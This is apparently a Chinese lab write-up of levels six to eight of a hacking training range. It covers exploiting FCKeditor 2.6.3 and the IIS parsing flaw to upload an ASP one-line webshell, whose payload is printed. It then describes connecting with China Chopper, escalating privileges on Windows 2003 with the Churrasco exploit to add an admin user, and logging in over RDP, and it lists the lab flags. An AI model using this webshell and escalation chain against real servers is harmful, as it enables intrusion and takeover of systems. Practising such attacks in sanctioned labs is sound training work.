白帽学院靶场之编辑器的奥秘（二）

       接着昨晚的写。来到了第六关。
       第六关的提示如下，这一关找flag的时候duang了一下。

       首先查看编辑器的版本信息。是FCKeditor的2.6.3版本。

       然后在网上找到有关fck编辑器的漏洞利用信息。提示了samples。从下面的信息中找到突破口。

       拿到flag06：d04jnfhduya3n1ld
       实际上远程主机上有一些工具已经备好。如Pker的地址:
C:\Documents and Settings\siny\桌面\Pker多线程后台极速扫描工具\Pker多线程后台极速扫描工具
       再往后就是点击上传图片栏，上传登录的远程主机上的1.jpg一句话图片马，其内容是<%eval request(“siny”)%>，将其上传到shell.asp文件夹下，利用IIS的解析漏洞实现利用。

                    

       访问是空白，表明已经成功了。接着用菜刀去连接。一句话地址如下：
http://192.168.2.2/uploadfile/image/shell.asp/2016030903493348.jpg

       得到flag07的值。flag07: ca20db309e056e3d

       最后一个flag是2.2的主机名。使用菜刀的终端，提示没有权限。又在远程主机上找到了siny的大马，2333.cer。上传上去。使用菜刀浏览目录时看到了C:\RECYCLER里的1cmd.exe和pr.exe文件。

       直接在cmd下查看主机名。填入答题框内，提示错误，索性就提权服务器，直接在服务器里搞了。

       里面上传好的pr.exe不好使，自己上传了一个巴西烤肉上去提权。king/998
      巴西烤肉的提权原理是利用Windows2003系统下的一个本地提权漏洞，通过此工具可以用SYSTEM权限执行命令，从而可以达到添加用户的目的。觉得这样一条条执行麻烦，也可以将添加新用户和提升管理员权限使用&&连接同时执行。


                    

       扫描端口，发现开启了3389，那就直接连吧。

       进来后查看计算机名。f02dea5d5d0b9315，这个才是真正的flag08。
         

       在登录的远程2.2主机上查看其主机名，仍然不同。原因我也实验了一下，是因为计算机的NetBIOS名称字符限制为15个，而完整计算机名可以自行修改并且重启后生效。出题者在这里动了点手脚。

       至此，该靶场本次渗透到此结束。o-|-o